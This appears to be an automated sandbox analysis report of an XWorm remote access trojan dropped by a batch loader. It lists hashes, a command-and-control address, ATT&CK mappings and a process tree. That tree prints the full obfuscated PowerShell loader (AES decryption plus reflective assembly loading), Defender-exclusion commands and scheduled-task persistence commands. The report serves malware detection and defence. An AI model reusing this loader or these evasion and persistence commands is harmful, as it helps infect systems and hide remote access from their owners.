xworm | 5ec787845e4c8569e81a28a415e6f0ff5b3ed9012f0cb30d1558adad98cd8680

Analysis

max time kernel
147s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
03-06-2024 23:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

loaderv3.bat
Size

300KB
MD5

82ce24de6320cb72c527deda4c1637f9
SHA1

aaebcf1e94c9ac15b129e2ad8aa89288fb4fa6f8
SHA256

5ec787845e4c8569e81a28a415e6f0ff5b3ed9012f0cb30d1558adad98cd8680
SHA512

c24fc762ec4b8dda569a502e93a3438460d8ecfacf83a5a2b9b0545338bd6369d861b56b9b96db0cb2e0914e751099be152fbc6d2cf018f15d7756a7e63ab048
SSDEEP

6144:w4WQ1SbqrV+rICzcuHYMq6jBo/CDlcQOxS:w4WQ1SWx+r7vKgICDlcQ8S

Score

10^/10

xworm execution persistence rat trojan

Malware Config

Extracted

Family

xworm

127.0.0.1:7489

continue-silk.gl.at.ply.gg:7489

Attributes

Install_directory
%ProgramData%
install_file
steamwebhelper.exe

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/2372-50-0x00000145A12F0000-0x00000145A1308000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 4 IoCs

flow	pid	Process
22	2372	powershell.exe
44	2372	powershell.exe
54	2372	powershell.exe
57	2372	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2124	powershell.exe
1848	powershell.exe
4548	powershell.exe
4380	powershell.exe
2740	powershell.exe
5004	powershell.exe
2372	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\steamwebhelper.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\steamwebhelper.lnk	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
2336	seroxen.lib.exe
2612	steamwebhelper.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\steamwebhelper = "C:\\ProgramData\\steamwebhelper.exe"	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
21	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3680	schtasks.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 23 IoCs

pid	Process
2740	powershell.exe
2740	powershell.exe
5004	powershell.exe
5004	powershell.exe
2372	powershell.exe
2372	powershell.exe
4548	powershell.exe
4548	powershell.exe
4548	powershell.exe
4380	powershell.exe
4380	powershell.exe
4380	powershell.exe
2124	powershell.exe
2124	powershell.exe
2124	powershell.exe
1848	powershell.exe
1848	powershell.exe
1848	powershell.exe
2372	powershell.exe
2372	powershell.exe
2612	steamwebhelper.exe
2612	steamwebhelper.exe
2612	steamwebhelper.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2740	powershell.exe
Token: SeDebugPrivilege	5004	powershell.exe
Token: SeIncreaseQuotaPrivilege	5004	powershell.exe
Token: SeSecurityPrivilege	5004	powershell.exe
Token: SeTakeOwnershipPrivilege	5004	powershell.exe
Token: SeLoadDriverPrivilege	5004	powershell.exe
Token: SeSystemProfilePrivilege	5004	powershell.exe
Token: SeSystemtimePrivilege	5004	powershell.exe
Token: SeProfSingleProcessPrivilege	5004	powershell.exe
Token: SeIncBasePriorityPrivilege	5004	powershell.exe
Token: SeCreatePagefilePrivilege	5004	powershell.exe
Token: SeBackupPrivilege	5004	powershell.exe
Token: SeRestorePrivilege	5004	powershell.exe
Token: SeShutdownPrivilege	5004	powershell.exe
Token: SeDebugPrivilege	5004	powershell.exe
Token: SeSystemEnvironmentPrivilege	5004	powershell.exe
Token: SeRemoteShutdownPrivilege	5004	powershell.exe
Token: SeUndockPrivilege	5004	powershell.exe
Token: SeManageVolumePrivilege	5004	powershell.exe
Token: 33	5004	powershell.exe
Token: 34	5004	powershell.exe
Token: 35	5004	powershell.exe
Token: 36	5004	powershell.exe
Token: SeIncreaseQuotaPrivilege	5004	powershell.exe
Token: SeSecurityPrivilege	5004	powershell.exe
Token: SeTakeOwnershipPrivilege	5004	powershell.exe
Token: SeLoadDriverPrivilege	5004	powershell.exe
Token: SeSystemProfilePrivilege	5004	powershell.exe
Token: SeSystemtimePrivilege	5004	powershell.exe
Token: SeProfSingleProcessPrivilege	5004	powershell.exe
Token: SeIncBasePriorityPrivilege	5004	powershell.exe
Token: SeCreatePagefilePrivilege	5004	powershell.exe
Token: SeBackupPrivilege	5004	powershell.exe
Token: SeRestorePrivilege	5004	powershell.exe
Token: SeShutdownPrivilege	5004	powershell.exe
Token: SeDebugPrivilege	5004	powershell.exe
Token: SeSystemEnvironmentPrivilege	5004	powershell.exe
Token: SeRemoteShutdownPrivilege	5004	powershell.exe
Token: SeUndockPrivilege	5004	powershell.exe
Token: SeManageVolumePrivilege	5004	powershell.exe
Token: 33	5004	powershell.exe
Token: 34	5004	powershell.exe
Token: 35	5004	powershell.exe
Token: 36	5004	powershell.exe
Token: SeIncreaseQuotaPrivilege	5004	powershell.exe
Token: SeSecurityPrivilege	5004	powershell.exe
Token: SeTakeOwnershipPrivilege	5004	powershell.exe
Token: SeLoadDriverPrivilege	5004	powershell.exe
Token: SeSystemProfilePrivilege	5004	powershell.exe
Token: SeSystemtimePrivilege	5004	powershell.exe
Token: SeProfSingleProcessPrivilege	5004	powershell.exe
Token: SeIncBasePriorityPrivilege	5004	powershell.exe
Token: SeCreatePagefilePrivilege	5004	powershell.exe
Token: SeBackupPrivilege	5004	powershell.exe
Token: SeRestorePrivilege	5004	powershell.exe
Token: SeShutdownPrivilege	5004	powershell.exe
Token: SeDebugPrivilege	5004	powershell.exe
Token: SeSystemEnvironmentPrivilege	5004	powershell.exe
Token: SeRemoteShutdownPrivilege	5004	powershell.exe
Token: SeUndockPrivilege	5004	powershell.exe
Token: SeManageVolumePrivilege	5004	powershell.exe
Token: 33	5004	powershell.exe
Token: 34	5004	powershell.exe
Token: 35	5004	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2372	powershell.exe

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 804 wrote to memory of 2740	804	cmd.exe	86
PID 804 wrote to memory of 2740	804	cmd.exe	86
PID 2740 wrote to memory of 5004	2740	powershell.exe	90
PID 2740 wrote to memory of 5004	2740	powershell.exe	90
PID 2740 wrote to memory of 4868	2740	powershell.exe	93
PID 2740 wrote to memory of 4868	2740	powershell.exe	93
PID 4868 wrote to memory of 5024	4868	WScript.exe	94
PID 4868 wrote to memory of 5024	4868	WScript.exe	94
PID 5024 wrote to memory of 2372	5024	cmd.exe	96
PID 5024 wrote to memory of 2372	5024	cmd.exe	96
PID 2372 wrote to memory of 2336	2372	powershell.exe	98
PID 2372 wrote to memory of 2336	2372	powershell.exe	98
PID 2372 wrote to memory of 2336	2372	powershell.exe	98
PID 2372 wrote to memory of 4548	2372	powershell.exe	101
PID 2372 wrote to memory of 4548	2372	powershell.exe	101
PID 2372 wrote to memory of 4380	2372	powershell.exe	104
PID 2372 wrote to memory of 4380	2372	powershell.exe	104
PID 2372 wrote to memory of 2124	2372	powershell.exe	107
PID 2372 wrote to memory of 2124	2372	powershell.exe	107
PID 2372 wrote to memory of 1848	2372	powershell.exe	109
PID 2372 wrote to memory of 1848	2372	powershell.exe	109
PID 2372 wrote to memory of 3680	2372	powershell.exe	111
PID 2372 wrote to memory of 3680	2372	powershell.exe	111

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\loaderv3.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:804
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xLde0JRLrIczMl9RxXziwroTVxq5HOanuhcsMouO6So='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8g2uqMTqX55+f+XUZTpqzw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $QupMx=New-Object System.IO.MemoryStream(,$param_var); $tyPSR=New-Object System.IO.MemoryStream; $UJjgx=New-Object System.IO.Compression.GZipStream($QupMx, [IO.Compression.CompressionMode]::Decompress); $UJjgx.CopyTo($tyPSR); $UJjgx.Dispose(); $QupMx.Dispose(); $tyPSR.Dispose(); $tyPSR.ToArray();}function execute_function($param_var,$param2_var){ $xhjgK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ilqWR=$xhjgK.EntryPoint; $ilqWR.Invoke($null, $param2_var);}$XSpOb = 'C:\Users\Admin\AppData\Local\Temp\loaderv3.bat';$host.UI.RawUI.WindowTitle = $XSpOb;$TBRhO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($XSpOb).Split([Environment]::NewLine);foreach ($EpZJp in $TBRhO) { if ($EpZJp.StartsWith(':: ')) { $nDory=$EpZJp.Substring(3); break; }}$payloads_var=[string[]]$nDory.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2740
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_320_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_320.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5004
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_320.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:4868
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_320.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5024
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xLde0JRLrIczMl9RxXziwroTVxq5HOanuhcsMouO6So='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8g2uqMTqX55+f+XUZTpqzw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $QupMx=New-Object System.IO.MemoryStream(,$param_var); $tyPSR=New-Object System.IO.MemoryStream; $UJjgx=New-Object System.IO.Compression.GZipStream($QupMx, [IO.Compression.CompressionMode]::Decompress); $UJjgx.CopyTo($tyPSR); $UJjgx.Dispose(); $QupMx.Dispose(); $tyPSR.Dispose(); $tyPSR.ToArray();}function execute_function($param_var,$param2_var){ $xhjgK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ilqWR=$xhjgK.EntryPoint; $ilqWR.Invoke($null, $param2_var);}$XSpOb = 'C:\Users\Admin\AppData\Roaming\startup_str_320.bat';$host.UI.RawUI.WindowTitle = $XSpOb;$TBRhO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($XSpOb).Split([Environment]::NewLine);foreach ($EpZJp in $TBRhO) { if ($EpZJp.StartsWith(':: ')) { $nDory=$EpZJp.Substring(3); break; }}$payloads_var=[string[]]$nDory.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2372
      - C:\Users\Admin\AppData\Local\Temp\seroxen.lib.exe
        
        "C:\Users\Admin\AppData\Local\Temp\seroxen.lib.exe"
        6⤵
        Executes dropped EXE
        
        PID:2336
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4548
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4380
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\steamwebhelper.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2124
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'steamwebhelper.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1848
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "steamwebhelper" /tr "C:\ProgramData\steamwebhelper.exe"
        6⤵
        Creates scheduled task(s)
        
        PID:3680

C:\ProgramData\steamwebhelper.exe
C:\ProgramData\steamwebhelper.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2612

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\steamwebhelper.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
10890cda4b6eab618e926c4118ab0647

SHA1
1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d

SHA256
00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14

SHA512
a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5c0923e8e7765d761022bd427d59e9ca

SHA1
7490e1b19c5662e6339a68ba67920992dbfa3d33

SHA256
299f9fcb2628833eea10626dc3888f94f104d317cb95c846ef61e3cf4521efa7

SHA512
a8e9a422d44ddfa8ceba2b245660e2657b3d2bd416d59dcc667baa74fcf113ec09b9b1c394aec37fe0c8aac10f938c710de3c0909db03b605097aa62569c01e1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
4a154efa7af25bb8b94d0d9c7b4f15cd

SHA1
5e0e04103e4eef1bc7ef242b730aed1958f98e1f

SHA256
c216eda372556eb78e680bde247c2fd2085642ee33031905a213c6bec502ccce

SHA512
fc4678133318fe1952947be74e244246336c7faacc9b9ae32336d57b106ec8f044e5db41dd98e8f3a54270ddacab2fc84a66d5d67deeadc3056ea5213bcbbba4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
98baf5117c4fcec1692067d200c58ab3

SHA1
5b33a57b72141e7508b615e17fb621612cb8e390

SHA256
30bf8496e9a08f4fdfe4767abcd565f92b6da06ca1c7823a70cb7cab16262e51

SHA512
344a70bfc037d54176f12db91f05bf4295bb587a5062fd1febe6f52853571170bd8ef6042cb87b893185bbae1937cf77b679d7970f8cc1c2666b0b7c1b32987d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0iy2ovvf.dl5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\seroxen.lib.exe

Filesize
10KB

MD5
dc92dfb6ad8f341ee6869cf0b7a1841d

SHA1
fe31fab27044f5b5157d2c7f69af298cd18d2e0e

SHA256
ab03b81ae4fa28295ed1a521f138d35de71fa9fc4f45360fa501e570feaa5665

SHA512
23532a88ece65ddf82014e0be5872e7169799971e410ac4ab3fb88a7aa56bb49e1979adce3d08704ab5e24c11a373ea6a5c713344b577760a860f1fa6dd061a4

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_320.bat

Filesize
300KB

MD5
82ce24de6320cb72c527deda4c1637f9

SHA1
aaebcf1e94c9ac15b129e2ad8aa89288fb4fa6f8

SHA256
5ec787845e4c8569e81a28a415e6f0ff5b3ed9012f0cb30d1558adad98cd8680

SHA512
c24fc762ec4b8dda569a502e93a3438460d8ecfacf83a5a2b9b0545338bd6369d861b56b9b96db0cb2e0914e751099be152fbc6d2cf018f15d7756a7e63ab048

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_320.vbs

Filesize
115B

MD5
1be597103652011e1630fd84088a18d8

SHA1
f3d5d1d08f9dff84bdc2d380b17aaa8f5ee73aeb

SHA256
774a5dcfbd99c77f329fe0e6d77bec92f88b9c234496bb3e2b46971c354b2bbc

SHA512
47426b751ac33944a4fe210eaf61babf09edbbb32aef3423877c63b1e75d0ca004404ac68a05652e85f372a3bcbf31228b95d3d947cc8612fd9e30f4af25f947

Download Submit
memory/2336-61-0x0000000000700000-0x0000000000708000-memory.dmp

Filesize
32KB

Download
memory/2372-50-0x00000145A12F0000-0x00000145A1308000-memory.dmp

Filesize
96KB

Download
memory/2612-121-0x00000277D5990000-0x00000277D5A06000-memory.dmp

Filesize
472KB

Download
memory/2612-120-0x00000277D56C0000-0x00000277D5704000-memory.dmp

Filesize
272KB

Download
memory/2740-12-0x00007FFEC07D0000-0x00007FFEC1291000-memory.dmp

Filesize
10.8MB

Download
memory/2740-14-0x000001F0EB180000-0x000001F0EB1BC000-memory.dmp

Filesize
240KB

Download
memory/2740-62-0x00007FFEC07D0000-0x00007FFEC1291000-memory.dmp

Filesize
10.8MB

Download
memory/2740-13-0x000001F0EB150000-0x000001F0EB158000-memory.dmp

Filesize
32KB

Download
memory/2740-11-0x00007FFEC07D0000-0x00007FFEC1291000-memory.dmp

Filesize
10.8MB

Download
memory/2740-1-0x000001F0D2F60000-0x000001F0D2F82000-memory.dmp

Filesize
136KB

Download
memory/2740-0-0x00007FFEC07D3000-0x00007FFEC07D5000-memory.dmp

Filesize
8KB

Download
memory/5004-16-0x00007FFEC07D0000-0x00007FFEC1291000-memory.dmp

Filesize
10.8MB

Download
memory/5004-29-0x00007FFEC07D0000-0x00007FFEC1291000-memory.dmp

Filesize
10.8MB

Download
memory/5004-17-0x00007FFEC07D0000-0x00007FFEC1291000-memory.dmp

Filesize
10.8MB

Download